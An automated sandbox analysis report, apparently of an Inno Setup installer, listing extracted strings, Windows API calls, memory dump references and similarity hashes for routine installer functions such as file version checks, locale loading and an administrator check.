Stripped read-only attribute., xrefs: 004CFC68
Version of our file: %u.%u.%u.%u, xrefs: 004CF894
Existing file is protected by Windows File Protection. Skipping., xrefs: 004CFB8B
Uninstaller requires administrator: %s, xrefs: 004CFF55
-- File entry --, xrefs: 004CF47D
Dest filename: %s, xrefs: 004CF628
Will register the file (a DLL/OCX) later., xrefs: 004D0321
.tmp, xrefs: 004CFD61
Non-default bitness: 64-bit, xrefs: 004CF645
Dest file is protected by Windows File Protection., xrefs: 004CF686
Same time stamp. Skipping., xrefs: 004CFAFE
Skipping due to "onlyifdoesntexist" flag., xrefs: 004CF76A
InUn, xrefs: 004CFF23
Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 004CFA6D
User opted not to overwrite the existing file. Skipping., xrefs: 004CFBE0
Existing file is a newer version. Skipping., xrefs: 004CF99B
Installing the file., xrefs: 004CFCAA
Will register the file (a type library) later., xrefs: 004D0315
Same version. Skipping., xrefs: 004CFA8E
Time stamp of existing file: (failed to read), xrefs: 004CF7DA
Time stamp of our file: %s, xrefs: 004CF737
Couldn't read time stamp. Skipping., xrefs: 004CFADE
Installing into GAC, xrefs: 004D051B
Version of existing file: %u.%u.%u.%u, xrefs: 004CF921
Time stamp of our file: (failed to read), xrefs: 004CF743
Incrementing shared file count (64-bit)., xrefs: 004D0392
Incrementing shared file count (32-bit)., xrefs: 004D03AC
Existing file's SHA-1 hash matches our file. Skipping., xrefs: 004CFA5E
Failed to strip read-only attribute., xrefs: 004CFC74
Version of our file: (none), xrefs: 004CF8A0
Skipping due to "onlyifdestfileexists" flag., xrefs: 004CFC9B
, xrefs: 004CF963, 004CFB38, 004CFBAC
Dest file exists., xrefs: 004CF757
Existing file has a later time stamp. Skipping., xrefs: 004CFB6C
Time stamp of existing file: %s, xrefs: 004CF7CE
tCP, xrefs: 004CFF37

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$Compare$FullLocalNamePath
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$tCP
API String ID: 2530247994-2604318246
Opcode ID: facef9c39548356d3169500f66b22e345eb3682d63ae184b190a80ee1bf711c3
Instruction ID: c9ae9c9552cc1a5e10666d42c6d5c44e39158865002ba6202da470e5cb5ad531
Opcode Fuzzy Hash: facef9c39548356d3169500f66b22e345eb3682d63ae184b190a80ee1bf711c3
Instruction Fuzzy Hash: 3E92D434A042889FDB11DFA5C491FEEBBB1AF05304F1440ABE944A7392C77CAE45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408370, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 207registrystringlibraryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 0040838C
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 004083AC
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 004083CA
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 004083E8
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00408406
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 0040844F
RegQueryValueExW.ADVAPI32(?,00408698,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001), ref: 0040846D
RegCloseKey.ADVAPI32(?,004084AB,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040849E
lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 004084BB
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004084C8
GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004084CE
lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004084FC
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408552
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00408562
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408592
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004085A2
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004085D1

Strings

Software\CodeGear\Locales, xrefs: 004083A2, 004083C0
Software\Borland\Delphi\Locales, xrefs: 004083FC
Software\Borland\Locales, xrefs: 004083DE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Openlstrcpyn$LibraryLoadLocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
API String ID: 3838733197-345420546
Opcode ID: dafdfd18fb6c40a2d41f9fc4910561df257b48953a1921b5bcc087da3586443a
Instruction ID: a500898f6dc47257e1585acfd824c909a598bb48bb2a219c79c4edbb62c36863
Opcode Fuzzy Hash: dafdfd18fb6c40a2d41f9fc4910561df257b48953a1921b5bcc087da3586443a
Instruction Fuzzy Hash: 3B615271A402197AEB20DAE5CD46FEF72BC9B08704F44407BBA40F65C1FABC9A448B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0047FFEC, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00480027
GetVersion.KERNEL32(00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00480044
GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048005E
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,004801D0,?,00503DD4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00480079
FreeSid.ADVAPI32(00000000,004801D7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004801CA

Strings

CheckTokenMembership, xrefs: 00480054
advapi32.dll, xrefs: 00480059

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2691416632-1888249752
Opcode ID: 85fa1cb0f7220eae132b325b28a21616a831ed5374fcd5784edbb641b88bc8dd
Instruction ID: 470ffb4e3a3b4e5bbcdb8d5971faf8775aa8bc9487a6afa9a0b77fb0be6964cb
Opcode Fuzzy Hash: 85fa1cb0f7220eae132b325b28a21616a831ed5374fcd5784edbb641b88bc8dd
Instruction Fuzzy Hash: 83518371A14305AEDB51FAE58C46BBF77A8AB44314F50087BBA00F22C2D67D9D088769

Uniqueness

Uniqueness Score: -1.00%

Function 004084AB, Relevance: 15.1, APIs: 10, Instructions: 108stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 004084BB
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004084C8
GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004084CE
lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004084FC
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408552
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00408562
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408592
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004085A2
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004085D1
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 004085E1

Strings

Software\CodeGear\Locales, xrefs: 004083A2, 004083C0
Software\Borland\Delphi\Locales, xrefs: 004083FC
Software\Borland\Locales, xrefs: 004083DE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
API String ID: 1599918012-345420546
Opcode ID: 4178ec917de22c9fa02476d0238962d15125bf17bcff0688646d60131478852f
Instruction ID: 2bdfecea2a4ebc7d9a87a4a5d20900cc82af348492f95972f04b7fe5743583f5
Opcode Fuzzy Hash: 4178ec917de22c9fa02476d0238962d15125bf17bcff0688646d60131478852f
Instruction Fuzzy Hash: 9B319671E0011976EB21DAE4DD49BEF62BC9B08304F44417BE540F76C1FABC9E448B59

Uniqueness

Uniqueness Score: -1.00%

Function 004736F8, Relevance: 12.4, APIs: 8, Instructions: 381windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(00000000), ref: 004737D0
SetFocus.USER32(00000000), ref: 00473871
SaveDC.GDI32(?), ref: 00473A33
RestoreDC.GDI32(?,?), ref: 00473AA4
GetWindowDC.USER32(00000000), ref: 00473B10
SaveDC.GDI32(?), ref: 00473B47
RestoreDC.GDI32(?,?), ref: 00473BAB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$FocusIconicWindow
String ID:
API String ID: 1400084646-0
Opcode ID: 313b0a009943794bb08a44e78a026992c22bce5e63494288621d234ccdeb1379
Instruction ID: 99e17f549cdb5917a778106b727c30c82aaf18a9347542855764466411fd1eb0
Opcode Fuzzy Hash: 313b0a009943794bb08a44e78a026992c22bce5e63494288621d234ccdeb1379
Instruction Fuzzy Hash: 93E1B271A00144DFDB11EF69C486AEEB3F1AB45305F1580AAF408AB752DB38DF44EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00470AAC, Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00470ABA
IsIconic.USER32(?), ref: 00470AE8
IsWindowVisible.USER32 ref: 00470AF8
ShowWindow.USER32(?,00000000,?,?,?,000000EC,00000000,?,?,?,0047C5E9,?,?), ref: 00470B15
SetWindowLongW.USER32 ref: 00470B28
SetWindowLongW.USER32 ref: 00470B39
ShowWindow.USER32(?,00000006,?,000000EC,00000000,?,?,?,000000EC,00000000,?,?,?,0047C5E9,?,?), ref: 00470B59
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,?,?,000000EC,00000000,?,?,?,0047C5E9,?,?), ref: 00470B63

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongShow$IconicVisible
String ID:
API String ID: 3484284227-0
Opcode ID: e5bb252052c3827ce0eb22ee7d105633cbd16a1b31010b5b68aa5c162d411533
Instruction ID: 0663f641c79fd0f2b1ef215e53694840f19cf8e665cc319dda5b02ef108d7702
Opcode Fuzzy Hash: e5bb252052c3827ce0eb22ee7d105633cbd16a1b31010b5b68aa5c162d411533
Instruction Fuzzy Hash: CB11860154F790B4D62266664C02FEF5A944FD3319F18862BF5D8A12C3C23D9A45C16F

Uniqueness

Uniqueness Score: -1.00%

Function 004D4F34, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004D50FD,?,0050BE1C,00000000), ref: 004D4F98
FindNextFileW.KERNEL32(00000000,?,00000000,?,00000000,004D50FD,?,0050BE1C,00000000), ref: 004D50C4
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004D50FD,?,0050BE1C,00000000), ref: 004D50D2

Strings

unins???.*, xrefs: 004D4F82
unins, xrefs: 004D4FEB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: 84a85936f2ae3e8cc09f2d22fe9d388a16c3c621d179e0a6c862a8b287a8d7e9
Instruction ID: 29a48aef8e3247e0ac0e11613788baf30bc01f880c0b30fe4734428ea49f59a6
Opcode Fuzzy Hash: 84a85936f2ae3e8cc09f2d22fe9d388a16c3c621d179e0a6c862a8b287a8d7e9
Instruction Fuzzy Hash: DA41C430A04A199FDB11DB24C8A46AE73E9AB45304F2085F7E405EB391EF39DE459B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0045C584, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

0bE, xrefs: 0045C6E5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0bE
API String ID: 0-2320990392
Opcode ID: 1d6a6a8ee36825852f3263ec8070decbc99011750050c87fe705aa8042d7e9ce
Instruction ID: c4681dd61e4fb1f14eeb39d814ec3ec5ab6ecb4a9d3bf7d1bb4788cbae046c2f
Opcode Fuzzy Hash: 1d6a6a8ee36825852f3263ec8070decbc99011750050c87fe705aa8042d7e9ce
Instruction Fuzzy Hash: B481A2346007559FC710EB29C4C87AB77E1AF49706F14416BE845973A2C7B8DD8DCB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004CC238, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004CC2CE,?,00000000,00000000,?,004CC2E4,?,004E945F), ref: 004CC255
CoCreateInstance.OLE32(005043F4,00000000,00000001,00504404,00000000,00000000,004CC2CE,?,00000000,00000000,?,004CC2E4,?,004E945F), ref: 004CC27B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: 5a8272a58d779a9ff3e59e3225e9fe670217fcd39215f7047cd38be8f1673ff7
Instruction ID: 0cbb7ac2259295afb7b051eb659837b379e3d7c8e3a609428212a0dba58409b6
Opcode Fuzzy Hash: 5a8272a58d779a9ff3e59e3225e9fe670217fcd39215f7047cd38be8f1673ff7
Instruction Fuzzy Hash: 29112276600208AFEB50EBA5CD85F5EB7E8EB04704F9140BAF504D72A1CB789D04DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004AD294, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004AD2F7,?,00000000,?), ref: 004AD2D1
GetLastError.KERNEL32(00000000,?,00000000,004AD2F7,?,00000000,?), ref: 004AD2D9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: c3989025904623eb7fb7b3387c10b1aa8a3ac9527e43e2b9db8540afddc07d10
Instruction ID: 78257613f464c8d49f4cf456e1dc99373cdef011849c960ad9d6e2ab1376e905
Opcode Fuzzy Hash: c3989025904623eb7fb7b3387c10b1aa8a3ac9527e43e2b9db8540afddc07d10
Instruction Fuzzy Hash: A6F0F932E042086FCB11DB6A9C4149EB7A8DB5A324B5146BBF814E36C1DA798D118198

Uniqueness

Uniqueness Score: -1.00%

Function 004B0060, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?), ref: 004B0076

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 0f543b6448fd4e8f98c1bf5f850c654d9e8172a78b83acfd065ecb1f254720fc
Instruction ID: 1b3bfb2b9877a23fbf6b5a4b0ff95e7820ad2e09aa7f9885fefbd09ac839109a
Opcode Fuzzy Hash: 0f543b6448fd4e8f98c1bf5f850c654d9e8172a78b83acfd065ecb1f254720fc
Instruction Fuzzy Hash: 21E0C27170430017D700BA799C82AEB728D9B84304F048C3E7DD5D62C2EABEDA5422AB

Uniqueness

Uniqueness Score: -1.00%

